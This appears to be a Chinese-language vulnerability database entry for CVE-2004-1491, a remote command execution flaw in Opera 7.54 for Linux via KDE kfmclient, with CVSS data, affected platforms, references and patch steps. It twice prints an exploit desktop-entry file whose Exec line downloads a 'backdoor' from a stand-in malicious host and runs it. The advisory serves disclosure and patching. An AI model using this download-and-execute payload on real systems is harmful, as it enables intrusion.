CVE-2004-1491
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:41:33
NMCOES    

[原文]Opera 7.54 and earlier uses kfmclient exec to handle unknown MIME types, which allows remote attackers to execute arbitrary code via a shortcut or launcher that contains an Exec entry.


[CNNVD]Opera Web Browser KDE KFMCLIENT远程命令执行漏洞(CNNVD-200412-224)

        Opera 7.54及之前版本使用kfmclient exec来处理未知的MIME类型,远程攻击者可以借助快捷键或含有Exec入口的启动器执行任意代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:suse:suse_linux:7.1::spa
cpe:/o:suse:suse_linux:4.3SuSE SuSE Linux 4.3
cpe:/o:suse:suse_linux:6.4::i386
cpe:/a:opera_software:opera_web_browser:7.54
cpe:/o:suse:suse_linux:6.4SuSE SuSE Linux 6.4
cpe:/o:suse:suse_linux:7.0::sparc
cpe:/o:suse:suse_linux:1.0SuSE SuSE Linux 1.0
cpe:/o:suse:suse_linux:6.3::ppc
cpe:/o:suse:suse_linux:9.0::personal
cpe:/o:suse:suse_linux:4.4SuSE SuSE Linux 4.4
cpe:/o:suse:suse_linux:6.4::ppc
cpe:/o:suse:suse_linux:5.3SuSE SuSE Linux 5.3
cpe:/o:suse:suse_linux:4.2SuSE SuSE Linux 4.2
cpe:/o:suse:suse_linux:9.1::personal
cpe:/o:suse:suse_linux:7.1::sparc
cpe:/o:suse:suse_linux:3.0
cpe:/o:suse:suse_linux:8.2::personal
cpe:/o:suse:suse_linux:9.2::x86_64
cpe:/o:suse:suse_linux:8.0::i386
cpe:/o:suse:suse_linux:4.4.1SuSE SuSE Linux 4.4.1
cpe:/o:suse:suse_linux:7.0SuSE SuSE Linux 7.0
cpe:/o:suse:suse_linux:6.0SuSE SuSE Linux 6.0
cpe:/o:suse:suse_linux:7.3::ppc
cpe:/o:suse:suse_linux:5.1SuSE SuSE Linux 5.1
cpe:/o:suse:suse_linux:7.0::i386
cpe:/o:kde:kde:3.2.3
cpe:/o:suse:suse_linux:7.3SuSE SuSE Linux 7.3
cpe:/o:suse:suse_linux:6.3SuSE SuSE Linux 6.3
cpe:/o:suse:suse_linux:7.1SuSE SuSE Linux 7.1
cpe:/o:suse:suse_linux:8.1SuSE SuSE Linux 8.1
cpe:/o:suse:suse_linux:6.4:alphaSuSE SuSE Linux 6.4 alpha
cpe:/o:suse:suse_linux:7.0::ppc
cpe:/o:suse:suse_linux:2.0
cpe:/o:gentoo:linuxGentoo Linux
cpe:/o:suse:suse_linux:7.3::i386
cpe:/o:suse:suse_linux:7.0:alphaSuSE SuSE Linux 7.0 alpha
cpe:/o:suse:suse_linux:6.1:alphaSuSE SuSE Linux 6.1 alpha
cpe:/o:suse:suse_linux:7.2::i386
cpe:/o:suse:suse_linux:9.2::personal
cpe:/o:suse:suse_linux:9.1::x86_64
cpe:/o:suse:suse_linux:4.0
cpe:/o:suse:suse_linux:5.0SuSE SuSE Linux 5.0
cpe:/o:suse:suse_linux:7.2SuSE SuSE Linux 7.2
cpe:/o:suse:suse_linux:7.1::x86
cpe:/o:suse:suse_linux:8.0SuSE SuSE Linux 8.0
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/o:suse:suse_linux:6.1SuSE SuSE Linux 6.1
cpe:/o:suse:suse_linux:7.3::sparc
cpe:/o:suse:suse_linux:6.2SuSE SuSE Linux 6.2
cpe:/o:suse:suse_linux:7.1:alphaSuSE SuSE Linux 7.1 alpha
cpe:/o:suse:suse_linux:6.3:alphaSuSE SuSE Linux 6.3 alpha
cpe:/o:suse:suse_linux:5.2SuSE SuSE Linux 5.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1491
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1491
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-224
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/11901
(PATCH)  BID  11901
http://www.gentoo.org/security/en/glsa/glsa-200502-17.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200502-17
http://secunia.com/advisories/13447/
(VENDOR_ADVISORY)  SECUNIA  13447
http://xforce.iss.net/xforce/xfdb/18457
(UNKNOWN)  XF  pera-kfmclient-command-execution(18457)
http://www.zone-h.org/advisories/read/id=6503
(VENDOR_ADVISORY)  MISC  http://www.zone-h.org/advisories/read/id=6503
http://www.opera.com/linux/changelogs/754u2/
(UNKNOWN)  CONFIRM  http://www.opera.com/linux/changelogs/754u2/
http://lists.suse.com/archive/suse-security-announce/2005-Mar/0007.html
(VENDOR_ADVISORY)  SUSE  SUSE-SR:2005:008

- 漏洞信息

Opera Web Browser KDE KFMCLIENT远程命令执行漏洞
中危 设计错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Opera 7.54及之前版本使用kfmclient exec来处理未知的MIME类型,远程攻击者可以借助快捷键或含有Exec入口的启动器执行任意代码。

- 公告与补丁

        The vendor has released fixes to address this and other issues.
        Gentoo has released an advisory (GLSA 200502-17) and an updated eBuild to address this and other issues in the Opera Web Browser. This update can be installed by issuing the following sequence of commands as a superuser:
        emerge --sync
        emerge --ask --oneshot --verbose ">=net-www/opera-7.54-r3"
        SUSE has released an advisory SUSE-SR:2005:008 to address various security issues affecting SUSE products. Please see the referenced advisory for more information.
        
        
        Opera Software Opera Web Browser 7.54
        

- 漏洞信息 (24828)

Opera Web Browser 7.54 KDE KFMCLIENT Remote Command Execution Vulnerability (EDBID:24828)
linux dos
2004-12-13 Verified
0 Giovanni Delvecchio
N/A [点击下载]
source: http://www.securityfocus.com/bid/11901/info

It is reported that Opera for Linux is susceptible to a remote command execution vulnerability. This issue is due to a default configuration setting in Opera that utilizes the KDE 'kfmclient' utility to open unknown content.

Exploitation of this issue allows attacker-supplied commands to be executed in the context of the user running Opera.

Version 7.54 of Opera for Linux with KDE version 3.2.3 is reported vulnerable to this issue. Other versions may also be affected.

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0		

- 漏洞信息

12399
Opera for Linux kfmclient Arbitrary Command Execution

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-12-13 Unknow
2004-12-13 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Opera Web Browser KDE KFMCLIENT Remote Command Execution Vulnerability
Design Error 11901
Yes No
2004-12-13 12:00:00 2009-07-12 08:07:00
"Giovanni Delvecchio" <badpenguin79@hotmail.com> disclosed this vulnerability.

- 受影响的程序版本

S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
S.u.S.E. Linux 7.3 sparc
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.2
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 6.4 i386
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4
S.u.S.E. Linux 6.3 ppc
S.u.S.E. Linux 6.3 alpha
S.u.S.E. Linux 6.3
S.u.S.E. Linux 6.2
S.u.S.E. Linux 6.1 alpha
S.u.S.E. Linux 6.1
S.u.S.E. Linux 6.0
S.u.S.E. Linux 5.3
S.u.S.E. Linux 5.2
S.u.S.E. Linux 5.1
S.u.S.E. Linux 5.0
S.u.S.E. Linux 4.4.1
S.u.S.E. Linux 4.4
S.u.S.E. Linux 4.3
S.u.S.E. Linux 4.2
S.u.S.E. Linux 4.0
S.u.S.E. Linux 3.0
S.u.S.E. Linux 2.0
S.u.S.E. Linux 1.0
Opera Software Opera Web Browser 7.54
Gentoo Linux

- 漏洞讨论

It is reported that Opera for Linux is susceptible to a remote command execution vulnerability. This issue is due to a default configuration setting in Opera that utilizes the KDE 'kfmclient' utility to open unknown content.

Exploitation of this issue allows attacker-supplied commands to be executed in the context of the user running Opera.

Version 7.54 of Opera for Linux with KDE version 3.2.3 is reported vulnerable to this issue. Other versions may also be affected.

- 漏洞利用

Example file contents have been provided:

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

- 解决方案

The vendor has released fixes to address this and other issues.

Gentoo has released an advisory (GLSA 200502-17) and an updated eBuild to address this and other issues in the Opera Web Browser. This update can be installed by issuing the following sequence of commands as a superuser:
emerge --sync
emerge --ask --oneshot --verbose ">=net-www/opera-7.54-r3"

SUSE has released an advisory SUSE-SR:2005:008 to address various security issues affecting SUSE products. Please see the referenced advisory for more information.


Opera Software Opera Web Browser 7.54

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站